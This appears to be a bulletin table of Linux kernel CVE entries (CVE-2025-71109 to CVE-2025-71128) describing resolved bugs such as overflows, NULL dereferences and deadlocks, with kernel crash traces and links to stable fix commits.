| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: ftrace: Fix memory corruption when kernel is located beyond 32 bits Since commit e424054000878 ("MIPS: Tracing: Reduce the overhead of dynamic Function Tracer"), the macro UASM_i_LA_mostly has been used, and this macro can generate more than 2 instructions. At the same time, the code in ftrace assumes that no more than 2 instructions can be generated, which is why it stores them in an int[2] array. However, as previously noted, the macro UASM_i_LA_mostly (and now UASM_i_LA) causes a buffer overflow when _mcount is beyond 32 bits. This leads to corruption of the variables located in the __read_mostly section. This corruption was observed because the variable __cpu_primary_thread_mask was corrupted, causing a hang very early during boot. This fix prevents the corruption by avoiding the generation of instructions if they could exceed 2 instructions in length. Fortunately, insn_la_mcount is only used if the instrumented code is located outside the kernel code section, so dynamic ftrace can still be used, albeit in a more limited scope. This is still preferable to corrupting memory and/or crashing the kernel. | 2026-01-14 | not yet calculated | CVE-2025-71109 | https://git.kernel.org/stable/c/e3e33ac2eb69d595079a1a1e444c2fb98efdd42d https://git.kernel.org/stable/c/7f39b9d0e86ed6236b9a5fb67616ab1f76c4f150 https://git.kernel.org/stable/c/36dac9a3dda1f2bae343191bc16b910c603cac25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/slub: reset KASAN tag in defer_free() before accessing freed memory When CONFIG_SLUB_TINY is enabled, kfree_nolock() calls kasan_slab_free() before defer_free(). On ARM64 with MTE (Memory Tagging Extension), kasan_slab_free() poisons the memory and changes the tag from the original (e.g., 0xf3) to a poison tag (0xfe). When defer_free() then tries to write to the freed object to build the deferred free list via llist_add(), the pointer still has the old tag, causing a tag mismatch and triggering a KASAN use-after-free report: BUG: KASAN: slab-use-after-free in defer_free+0x3c/0xbc mm/slub.c:6537 Write at addr f3f000000854f020 by task kworker/u8:6/983 Pointer tag: [f3], memory tag: [fe] Fix this by calling kasan_reset_tag() before accessing the freed memory. This is safe because defer_free() is part of the allocator itself and is expected to manipulate freed memory for bookkeeping purposes. | 2026-01-14 | not yet calculated | CVE-2025-71110 | https://git.kernel.org/stable/c/65d4e5af2a2e82f4fc50d8259aee208fbc6b2c1d https://git.kernel.org/stable/c/53ca00a19d345197a37a1bf552e8d1e7b091666c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (w83791d) Convert macros to functions to avoid TOCTOU The macro FAN_FROM_REG evaluates its arguments multiple times. When used in lockless contexts involving shared driver data, this leads to Time-of-Check to Time-of-Use (TOCTOU) race conditions, potentially causing divide-by-zero errors. Convert the macro to a static function. This guarantees that arguments are evaluated only once (pass-by-value), preventing the race conditions. Additionally, in store_fan_div, move the calculation of the minimum limit inside the update lock. This ensures that the read-modify-write sequence operates on consistent data. Adhere to the principle of minimal changes by only converting macros that evaluate arguments multiple times and are used in lockless contexts. | 2026-01-14 | not yet calculated | CVE-2025-71111 | https://git.kernel.org/stable/c/3dceb68f6ad33156032ef4da21a93d84059cca6d https://git.kernel.org/stable/c/bf5b03227f2e6d4360004886d268f9df8993ef8f https://git.kernel.org/stable/c/f2b579a0c37c0df19603d719894a942a295f634a https://git.kernel.org/stable/c/f94800fbc26ccf7c81eb791707b038a57aa39a18 https://git.kernel.org/stable/c/a9fb6e8835a22f5796c1182ed612daed3fd273af https://git.kernel.org/stable/c/c8cf0c2bdcccc6634b6915ff793b844e12436680 https://git.kernel.org/stable/c/670d7ef945d3a84683594429aea6ab2cdfa5ceb4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: add VLAN id validation before using Currently, the VLAN id may be used without validation when receiving a VLAN configuration mailbox from a VF. The length of vlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause out-of-bounds memory access once the VLAN id is bigger than or equal to VLAN_N_VID. Therefore, the VLAN id needs to be checked to ensure it is within the range of VLAN_N_VID. | 2026-01-14 | not yet calculated | CVE-2025-71112 | https://git.kernel.org/stable/c/46c7d9fe8dd869ea5de666aba8c1ec1061ca44a8 https://git.kernel.org/stable/c/42c91dfa772c57de141e5a55a187ac760c0fd7e1 https://git.kernel.org/stable/c/00e56a7706e10b3d00a258d81fcb85a7e96372d6 https://git.kernel.org/stable/c/b7b4f3bf118f51b67691a55b464f04452e5dc6fc https://git.kernel.org/stable/c/95cca255a7a5ad782639ff0298c2a486707d1046 https://git.kernel.org/stable/c/91a51d01be5c9f82c12c2921ca5cceaa31b67128 https://git.kernel.org/stable/c/6ef935e65902bfed53980ad2754b06a284ea8ac1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - zero initialize memory allocated via sock_kmalloc Several crypto user API contexts and requests allocated with sock_kmalloc() were left uninitialized, relying on callers to set fields explicitly. This resulted in the use of uninitialized data in certain error paths or when new fields are added in the future. The ACVP patches also contain two user-space interface files: algif_kpp.c and algif_akcipher.c. These too rely on proper initialization of their context structures. A particular issue has been observed with the newly added 'inflight' variable introduced in af_alg_ctx by commit: 67b164a871af ("crypto: af_alg - Disallow multiple in-flight AIO requests") Because the context is not memset to zero after allocation, the inflight variable has contained garbage values. As a result, af_alg_alloc_areq() has incorrectly returned -EBUSY randomly when the garbage value was interpreted as true: https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209 The check directly tests ctx->inflight without explicitly comparing against true/false. Since inflight is only ever set to true or false later, an uninitialized value has triggered -EBUSY failures. Zero-initializing memory allocated with sock_kmalloc() ensures inflight and other fields start in a known state, removing random issues caused by uninitialized data. | 2026-01-14 | not yet calculated | CVE-2025-71113 | https://git.kernel.org/stable/c/e125c8e346e4eb7b3e854c862fcb4392bc13ddba https://git.kernel.org/stable/c/543bf004e4eafbb302b1e6c78570d425d2ca13a0 https://git.kernel.org/stable/c/f81244fd6b14fecfa93b66b6bb1d59f96554e550 https://git.kernel.org/stable/c/84238876e3b3b262cf62d5f4d1338e983fb27010 https://git.kernel.org/stable/c/5a4b65523608974a81edbe386f8a667a3e10c726 https://git.kernel.org/stable/c/51a5ab36084f3251ef87eda3e6a6236f6488925e https://git.kernel.org/stable/c/6f6e309328d53a10c0fe1f77dec2db73373179b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: via_wdt: fix critical boot hang due to unnamed resource allocation The VIA watchdog driver uses allocate_resource() to reserve a MMIO region for the watchdog control register. However, the allocated resource was not given a name, which causes the kernel resource tree to contain an entry marked as "<BAD>" under /proc/iomem on x86 platforms. During boot, this unnamed resource can lead to a critical hang because subsequent resource lookups and conflict checks fail to handle the invalid entry properly. | 2026-01-14 | not yet calculated | CVE-2025-71114 | https://git.kernel.org/stable/c/1d56025a3af50db0f3da2792f41eb9943eee5324 https://git.kernel.org/stable/c/c7b986adc9e9336066350542ac5a2005d305ae78 https://git.kernel.org/stable/c/47c910965c936724070d2a8094a4c3ed8f452856 https://git.kernel.org/stable/c/d2c7c90aca7b37f60f16b2bedcfeb16204f2f35d https://git.kernel.org/stable/c/f7b6370d0fbee06a867037d675797a606cb62e57 https://git.kernel.org/stable/c/c6a2dd4f2e4e6cbdfe7a1618160281af897b75db https://git.kernel.org/stable/c/7aa31ee9ec92915926e74731378c009c9cc04928 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: um: init cpu_tasks[] earlier This is currently done in uml_finishsetup(), but e.g. with KCOV enabled we'll crash because some init code can call into e.g. memparse(), which has coverage annotations, and then the checks in check_kcov_mode() crash because current is NULL. Simply initialize the cpu_tasks[] array statically, which fixes the crash. For the later SMP work, it seems to have not really caused any problems yet, but initialize all of the entries anyway. | 2026-01-14 | not yet calculated | CVE-2025-71115 | https://git.kernel.org/stable/c/dbbf6d47130674640cd12a0781a0fb2a575d0e44 https://git.kernel.org/stable/c/7b5d4416964c07c902163822a30a622111172b01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: make decode_pool() more resilient against corrupted osdmaps If the osdmap is (maliciously) corrupted such that the encoded length of ceph_pg_pool envelope is less than what is expected for a particular encoding version, out-of-bounds reads may ensue because the only bounds check that is there is based on that length value. This patch adds explicit bounds checks for each field that is decoded or skipped. | 2026-01-14 | not yet calculated | CVE-2025-71116 | https://git.kernel.org/stable/c/d061be4c8040ffb1110d537654a038b8b6ad39d2 https://git.kernel.org/stable/c/145d140abda80e33331c5781d6603014fa75d258 https://git.kernel.org/stable/c/c82e39ff67353a5a6cbc07b786b8690bd2c45aaa https://git.kernel.org/stable/c/e927ab132b87ba3f076705fc2684d94b24201ed1 https://git.kernel.org/stable/c/5d0d8c292531fe356c4e94dcfdf7d7212aca9957 https://git.kernel.org/stable/c/2acb8517429ab42146c6c0ac1daed1f03d2fd125 https://git.kernel.org/stable/c/8c738512714e8c0aa18f8a10c072d5b01c83db39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: Remove queue freezing from several sysfs store callbacks Freezing the request queue from inside sysfs store callbacks may cause a deadlock in combination with the dm-multipath driver and the queue_if_no_path option. Additionally, freezing the request queue slows down system boot on systems where sysfs attributes are set synchronously. Fix this by removing the blk_mq_freeze_queue() / blk_mq_unfreeze_queue() calls from the store callbacks that do not strictly need these callbacks. Add the __data_racy annotation to request_queue.rq_timeout to suppress KCSAN data race reports about the rq_timeout reads. This patch may cause a small delay in applying the new settings. For all the attributes affected by this patch, I/O will complete correctly whether the old or the new value of the attribute is used. This patch affects the following sysfs attributes: * io_poll_delay * io_timeout * nomerges * read_ahead_kb * rq_affinity Here is an example of a deadlock triggered by running test srp/002 if this patch is not applied: task:multipathd Call Trace: <TASK> __schedule+0x8c1/0x1bf0 schedule+0xdd/0x270 schedule_preempt_disabled+0x1c/0x30 __mutex_lock+0xb89/0x1650 mutex_lock_nested+0x1f/0x30 dm_table_set_restrictions+0x823/0xdf0 __bind+0x166/0x590 dm_swap_table+0x2a7/0x490 do_resume+0x1b1/0x610 dev_suspend+0x55/0x1a0 ctl_ioctl+0x3a5/0x7e0 dm_ctl_ioctl+0x12/0x20 __x64_sys_ioctl+0x127/0x1a0 x64_sys_call+0xe2b/0x17d0 do_syscall_64+0x96/0x3a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> task:(udev-worker) Call Trace: <TASK> __schedule+0x8c1/0x1bf0 schedule+0xdd/0x270 blk_mq_freeze_queue_wait+0xf2/0x140 blk_mq_freeze_queue_nomemsave+0x23/0x30 queue_ra_store+0x14e/0x290 queue_attr_store+0x23e/0x2c0 sysfs_kf_write+0xde/0x140 kernfs_fop_write_iter+0x3b2/0x630 vfs_write+0x4fd/0x1390 ksys_write+0xfd/0x230 __x64_sys_write+0x76/0xc0 x64_sys_call+0x276/0x17d0 do_syscall_64+0x96/0x3a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> | 2026-01-14 | not yet calculated | CVE-2025-71117 | https://git.kernel.org/stable/c/3997b3147c7b68b0308378fa95a766015f8ceb1c https://git.kernel.org/stable/c/935a20d1bebf6236076785fac3ff81e3931834e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPICA: Avoid walking the Namespace if start_node is NULL Although commit 0c9992315e73 ("ACPICA: Avoid walking the ACPI Namespace if it is not there") fixed the situation when both start_node and acpi_gbl_root_node are NULL, the Linux kernel mainline still crashes on the Honor Magicbook 14 Pro [1]. That happens due to the access to the parent_node member in acpi_ns_get_next_node(). The NULL pointer dereference will always happen, no matter whether or not start_node is equal to ACPI_ROOT_OBJECT, so move the check of start_node being NULL out of the if block. Unfortunately, all attempts to contact Honor have failed; they refused to provide any technical support for Linux. A dump of the bad DSDT table can be found on GitHub [2]. DMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025 [ rjw: Subject adjustment, changelog edits ] | 2026-01-14 | not yet calculated | CVE-2025-71118 | https://git.kernel.org/stable/c/b84edef48cc8afb41150949a87dcfa81bc95b53e https://git.kernel.org/stable/c/ecb296286c8787895625bd4c53e9478db4ae139c https://git.kernel.org/stable/c/7f9b951ed11842373851dd3c91860778356d62d3 https://git.kernel.org/stable/c/1bc34293dfbd266c29875206849b4f8e8177e6df https://git.kernel.org/stable/c/0d8bb08126920fd4b12dbf32d9250757c9064b36 https://git.kernel.org/stable/c/f91dad0a3b381244183ffbea4cec5a7a69d6f41e https://git.kernel.org/stable/c/9d6c58dae8f6590c746ac5d0012ffe14a77539f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/kexec: Enable SMT before waking offline CPUs If SMT is disabled or a partial SMT state is enabled, when a new kernel image is loaded for kexec, on reboot the following warning is observed: kexec: Waking offline cpu 228. WARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc [snip] NIP kexec_prepare_cpus+0x1b0/0x1bc LR kexec_prepare_cpus+0x1a0/0x1bc Call Trace: kexec_prepare_cpus+0x1a0/0x1bc (unreliable) default_machine_kexec+0x160/0x19c machine_kexec+0x80/0x88 kernel_kexec+0xd0/0x118 __do_sys_reboot+0x210/0x2c4 system_call_exception+0x124/0x320 system_call_vectored_common+0x15c/0x2ec This occurs as add_cpu() fails due to cpu_bootable() returning false for CPUs that fail the cpu_smt_thread_allowed() check or non primary threads if SMT is disabled. Fix the issue by enabling SMT and resetting the number of SMT threads to the number of threads per core, before attempting to wake up all present CPUs. | 2026-01-14 | not yet calculated | CVE-2025-71119 | https://git.kernel.org/stable/c/7cccd82a0e4aad192fd74fc60e61ed9aed5857a3 https://git.kernel.org/stable/c/d790ef0c4819424ee0c2f448c0a8154c5ca369d1 https://git.kernel.org/stable/c/f0c0a681ffb77b8c5290c88c02d968199663939b https://git.kernel.org/stable/c/0d5c9e901ad40bd39b38e119c0454b52d7663930 https://git.kernel.org/stable/c/c2296a1e42418556efbeb5636c4fa6aa6106713a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf A zero length gss_token results in pages == 0 and in_token->pages[0] is NULL. The code unconditionally evaluates page_address(in_token->pages[0]) for the initial memcpy, which can dereference NULL even when the copy length is 0. Guard the first memcpy so it only runs when length > 0. | 2026-01-14 | not yet calculated | CVE-2025-71120 | https://git.kernel.org/stable/c/a8f1e445ce3545c90d69c9e8ff8f7821825fe810 https://git.kernel.org/stable/c/4dedb6a11243a5c9eb9dbb97bca3c98bd725e83d https://git.kernel.org/stable/c/f9e53f69ac3bc4ef568b08d3542edac02e83fefd https://git.kernel.org/stable/c/7452d53f293379e2c38cfa8ad0694aa46fc4788b https://git.kernel.org/stable/c/a2c6f25ab98b423f99ccd94874d655b8bcb01a19 https://git.kernel.org/stable/c/1c8bb965e9b0559ff0f5690615a527c30f651dd8 https://git.kernel.org/stable/c/d4b69a6186b215d2dc1ebcab965ed88e8d41768d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: parisc: Do not reprogram affinity on ASP chip The ASP chip is a very old variant of the GSP chip and is used e.g. in HP 730 workstations. When trying to reprogram the affinity it will crash with a HPMC as the relevant registers don't seem to be at the usual location. Let's avoid the crash by checking the sversion. Also note that reprogramming isn't necessary either, as the HP730 is just a single-CPU machine. | 2026-01-14 | not yet calculated | CVE-2025-71121 | https://git.kernel.org/stable/c/845a92b74cf7a730200532ecb4482981cec9d006 https://git.kernel.org/stable/c/7a146f34e5be96330467397c9fd9d3d851b2cbbe https://git.kernel.org/stable/c/4d0858bbeea12a50bfb32137f74d4b74917ebadd https://git.kernel.org/stable/c/e09fd2eb6d4c993ee9eaae556cb51e30ec1042df https://git.kernel.org/stable/c/60560d13ff368415c96a0c1247bea16d427c0641 https://git.kernel.org/stable/c/c8f810e20f4bbe50b49f73429d9fa6efad00623e https://git.kernel.org/stable/c/dca7da244349eef4d78527cafc0bf80816b261f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd/selftest: Check for overflow in IOMMU_TEST_OP_ADD_RESERVED syzkaller found it could overflow math in the test infrastructure and cause a WARN_ON by corrupting the reserved interval tree. This only affects test kernels with CONFIG_IOMMUFD_TEST. Validate the user input length in the test ioctl. | 2026-01-14 | not yet calculated | CVE-2025-71122 | https://git.kernel.org/stable/c/4cc829d61f10c20523fd4085c1546e741a792a97 https://git.kernel.org/stable/c/e6c122cffcbb2e84d321ec8ba0e38ce8e7c10925 https://git.kernel.org/stable/c/b166b8e0a381429fefd9180e67fbc834b3cee82f https://git.kernel.org/stable/c/e6a973af11135439de32ece3b9cbe3bfc043bea8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix string copying in parse_apply_sb_mount_options() strscpy_pad() can't be used to copy a non-NUL-term string into a NUL-term string of possibly bigger size. Commit 0efc5990bca5 ("string.h: Introduce memtostr() and memtostr_pad()") provides additional information in that regard. So if this happens, the following warning is observed: strnlen: detected buffer overflow: 65 byte read of buffer size 64 WARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032 Modules linked in: CPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032 Call Trace: <TASK> __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039 strnlen include/linux/fortify-string.h:235 [inline] sized_strscpy include/linux/fortify-string.h:309 [inline] parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline] __ext4_fill_super fs/ext4/super.c:5261 [inline] ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706 get_tree_bdev_flags+0x387/0x620 fs/super.c:1636 vfs_get_tree+0x93/0x380 fs/super.c:1814 do_new_mount fs/namespace.c:3553 [inline] path_mount+0x6ae/0x1f70 fs/namespace.c:3880 do_mount fs/namespace.c:3893 [inline] __do_sys_mount fs/namespace.c:4103 [inline] __se_sys_mount fs/namespace.c:4080 [inline] __x64_sys_mount+0x280/0x300 fs/namespace.c:4080 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x76/0x7e Since userspace is expected to provide s_mount_opts field to be at most 63 characters long with the ending byte being NUL-term, use a 64-byte buffer which matches the size of s_mount_opts, so that strscpy_pad() does its job properly. Return with error if the user still managed to provide a non-NUL-term string here. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-01-14 | not yet calculated | CVE-2025-71123 | https://git.kernel.org/stable/c/52ac96c4a2dd7bc47666000440b0602d9742e820 https://git.kernel.org/stable/c/6e37143560e37869d51b7d9e0ac61fc48895f8a0 https://git.kernel.org/stable/c/902ca2356f1e3ec5355c5808ad5d3f9d0095b0cc https://git.kernel.org/stable/c/db9ee13fab0267eccf6544ee35b16c9522db9aac https://git.kernel.org/stable/c/5bbacbbf1ca4419861dca3c6b82707c10e9c021c https://git.kernel.org/stable/c/ee5a977b4e771cc181f39d504426dbd31ed701cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/a6xx: move preempt_prepare_postamble after error check Move the call to preempt_prepare_postamble() after verifying that preempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL, dereferencing it in preempt_prepare_postamble() would lead to a crash. This change avoids calling the preparation function when the postamble allocation has failed, preventing potential NULL pointer dereference and ensuring proper error handling. Patchwork: https://patchwork.freedesktop.org/patch/687659/ | 2026-01-14 | not yet calculated | CVE-2025-71124 | https://git.kernel.org/stable/c/2c46497eb148ec61909f4101b8443f3c4c2daaec https://git.kernel.org/stable/c/ef3b04091fd8bc737dc45312375df8625b8318e2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Do not register unsupported perf events Synthetic events currently do not have a function to register perf events. This leads to calling the tracepoint register functions with a NULL function pointer which triggers: ------------[ cut here ]------------ WARNING: kernel/tracepoint.c:175 at tracepoint_add_func+0x357/0x370, CPU#2: perf/2272 Modules linked in: kvm_intel kvm irqbypass CPU: 2 UID: 0 PID: 2272 Comm: perf Not tainted 6.18.0-ftest-11964-ge022764176fc-dirty #323 PREEMPTLAZY Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 RIP: 0010:tracepoint_add_func+0x357/0x370 Code: 28 9c e8 4c 0b f5 ff eb 0f 4c 89 f7 48 c7 c6 80 4d 28 9c e8 ab 89 f4 ff 31 c0 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc cc <0f> 0b 49 c7 c6 ea ff ff ff e9 ee fe ff ff 0f 0b e9 f9 fe ff ff 0f RSP: 0018:ffffabc0c44d3c40 EFLAGS: 00010246 RAX: 0000000000000001 RBX: ffff9380aa9e4060 RCX: 0000000000000000 RDX: 000000000000000a RSI: ffffffff9e1d4a98 RDI: ffff937fcf5fd6c8 RBP: 0000000000000001 R08: 0000000000000007 R09: ffff937fcf5fc780 R10: 0000000000000003 R11: ffffffff9c193910 R12: 000000000000000a R13: ffffffff9e1e5888 R14: 0000000000000000 R15: ffffabc0c44d3c78 FS: 00007f6202f5f340(0000) GS:ffff93819f00f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055d3162281a8 CR3: 0000000106a56003 CR4: 0000000000172ef0 Call Trace: <TASK> tracepoint_probe_register+0x5d/0x90 synth_event_reg+0x3c/0x60 perf_trace_event_init+0x204/0x340 perf_trace_init+0x85/0xd0 perf_tp_event_init+0x2e/0x50 perf_try_init_event+0x6f/0x230 ? perf_event_alloc+0x4bb/0xdc0 perf_event_alloc+0x65a/0xdc0 __se_sys_perf_event_open+0x290/0x9f0 do_syscall_64+0x93/0x7b0 ? entry_SYSCALL_64_after_hwframe+0x76/0x7e ? trace_hardirqs_off+0x53/0xc0 entry_SYSCALL_64_after_hwframe+0x76/0x7e Instead, have the code return -ENODEV, which doesn't warn and has perf error out with: # perf record -e synthetic:futex_wait Error: The sys_perf_event_open() syscall returned with 19 (No such device) for event (synthetic:futex_wait). "dmesg | grep -i perf" may provide additional information. Ideally perf should support synthetic events, but for now just fix the warning. The support can come later. | 2026-01-14 | not yet calculated | CVE-2025-71125 | https://git.kernel.org/stable/c/6819bc6285c0ff835f67cfae7efebc03541782f6 https://git.kernel.org/stable/c/6d15f08e6d8d4b4fb02d90805ea97f3e2c1d6fbc https://git.kernel.org/stable/c/f7305697b60d79bc69c0a6e280fc931b4e8862dd https://git.kernel.org/stable/c/65b1971147ec12f0b1cee0811c859a3d7d9b04ce https://git.kernel.org/stable/c/3437c775bf209c674ad66304213b6b3c3b1b3f69 https://git.kernel.org/stable/c/6df47e5bb9b62d72f186f826ab643ea1856877c7 https://git.kernel.org/stable/c/ef7f38df890f5dcd2ae62f8dbde191d72f3bebae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: avoid deadlock on fallback while reinjecting Jakub reported an MPTCP deadlock at fallback time: WARNING: possible recursive locking detected 6.18.0-rc7-virtme #1 Not tainted -------------------------------------------- mptcp_connect/20858 is trying to acquire lock: ff1100001da18b60 (&msk->fallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280 but task is already holding lock: ff1100001da18b60 (&msk->fallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&msk->fallback_lock); lock(&msk->fallback_lock); *** DEADLOCK *** May be due to missing lock nesting notation 3 locks held by mptcp_connect/20858: #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0 #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0 #2: ff1100001da18b60 (&msk->fallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0 stack backtrace: CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full) Hardware name: Bochs, BIOS Bochs 01/01/2011 Call Trace: <TASK> dump_stack_lvl+0x6f/0xa0 print_deadlock_bug.cold+0xc0/0xcd validate_chain+0x2ff/0x5f0 __lock_acquire+0x34c/0x740 lock_acquire.part.0+0xbc/0x260 _raw_spin_lock_bh+0x38/0x50 __mptcp_try_fallback+0xd8/0x280 mptcp_sendmsg_frag+0x16c2/0x3050 __mptcp_retrans+0x421/0xaa0 mptcp_release_cb+0x5aa/0xa70 release_sock+0xab/0x1d0 mptcp_sendmsg+0xd5b/0x1bc0 sock_write_iter+0x281/0x4d0 new_sync_write+0x3c5/0x6f0 vfs_write+0x65e/0xbb0 ksys_write+0x17e/0x200 do_syscall_64+0xbb/0xfd0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7fa5627cbc5e Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 <c9> c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005 RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920 R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c The packet scheduler could attempt a reinjection after receiving an MP_FAIL and before the infinite map has been transmitted, causing a deadlock since MPTCP needs to do the reinjection atomically with respect to fallback. Address the issue by explicitly avoiding the reinjection in the critical scenario. Note that this is the only fallback critical section that could potentially send packets and hit the double-lock. | 2026-01-14 | not yet calculated | CVE-2025-71126 | https://git.kernel.org/stable/c/0107442e82c0f8d6010e07e6030741c59c520d6e https://git.kernel.org/stable/c/252892d5a6a2f163ce18f32716e46fa4da7d4e79 https://git.kernel.org/stable/c/0ca9fb4335e726dab4f23b3bfe87271d8f005f41 https://git.kernel.org/stable/c/50f47c02be419bf0a3ae94c118addf67beef359f https://git.kernel.org/stable/c/ffb8c27b0539dd90262d1021488e7817fae57c42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: Discard Beacon frames to non-broadcast address Beacon frames are required to be sent to the broadcast address, see IEEE Std 802.11-2020, 11.1.3.1 ("The Address 1 field of the Beacon .. frame shall be set to the broadcast address"). A unicast Beacon frame might be used as a targeted attack to get one of the associated STAs to do something (e.g., using CSA to move it to another channel). As such, it is better to have strict filtering for this on the receiver side and discard all Beacon frames that are sent to an unexpected address. This is even more important for cases where beacon protection is used. The current implementation in mac80211 is correctly discarding unicast Beacon frames if the Protected Frame bit in the Frame Control field is set to 0. However, if that bit is set to 1, the logic used for checking for configured BIGTK(s) does not actually work. If the driver does not have logic for dropping unicast Beacon frames with Protected Frame bit 1, these frames would be accepted in mac80211 processing as valid Beacon frames even though they are not protected. This would allow beacon protection to be bypassed. While the logic for checking beacon protection could be extended to cover this corner case, a more generic check that discards all Beacon frames with a unicast A1 address covers this without needing additional changes. Address all these issues by dropping received Beacon frames if they are sent to a non-broadcast address. | 2026-01-14 | not yet calculated | CVE-2025-71127 | https://git.kernel.org/stable/c/be0974be5c42584e027883ac2af7dab5e950098c https://git.kernel.org/stable/c/0a59a3895f804469276d188effa511c72e752f35 https://git.kernel.org/stable/c/88aab153d1528bc559292a12fb5105ee97528e1f https://git.kernel.org/stable/c/6e5bff40bb38741e40c33043ba0816fba5f93661 https://git.kernel.org/stable/c/7b240a8935d554ad36a52c2c37c32039f9afaef2 https://git.kernel.org/stable/c/a21704df4024708be698fb3fd5830d5b113b70e0 https://git.kernel.org/stable/c/193d18f60588e95d62e0f82b6a53893e5f2f19f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erspan: Initialize options_len before referencing options. The struct ip_tunnel_info has a flexible array member named options that is protected by a counted_by(options_len) attribute. The compiler will use this information to enforce runtime bounds checking deployed by FORTIFY_SOURCE string helpers. As laid out in the GCC documentation, the counter must be initialized before the first reference to the flexible array member. After scanning through the files that use struct ip_tunnel_info and also refer to options or options_len, it appears the normal case is to use the ip_tunnel_info_opts_set() helper. Said helper would initialize options_len properly before copying data into options, however in the GRE ERSPAN code a partial update is done, preventing the use of the helper function. Before this change the handling of ERSPAN traffic in GRE tunnels would cause a kernel panic when the kernel is compiled with GCC 15+ and having FORTIFY_SOURCE configured: memcpy: detected buffer overflow: 4 byte write of buffer size 0 Call Trace: <IRQ> __fortify_panic+0xd/0xf erspan_rcv.cold+0x68/0x83 ? ip_route_input_slow+0x816/0x9d0 gre_rcv+0x1b2/0x1c0 gre_rcv+0x8e/0x100 ? raw_v4_input+0x2a0/0x2b0 ip_protocol_deliver_rcu+0x1ea/0x210 ip_local_deliver_finish+0x86/0x110 ip_local_deliver+0x65/0x110 ? ip_rcv_finish_core+0xd6/0x360 ip_rcv+0x186/0x1a0 Reported-at: https://launchpad.net/bugs/2129580 | 2026-01-14 | not yet calculated | CVE-2025-71128 | https://git.kernel.org/stable/c/b282b2a9eed848587c1348abdd5d83fa346a2743 https://git.kernel.org/stable/c/35ddf66c65eff93fff91406756ba273600bf61a3 |
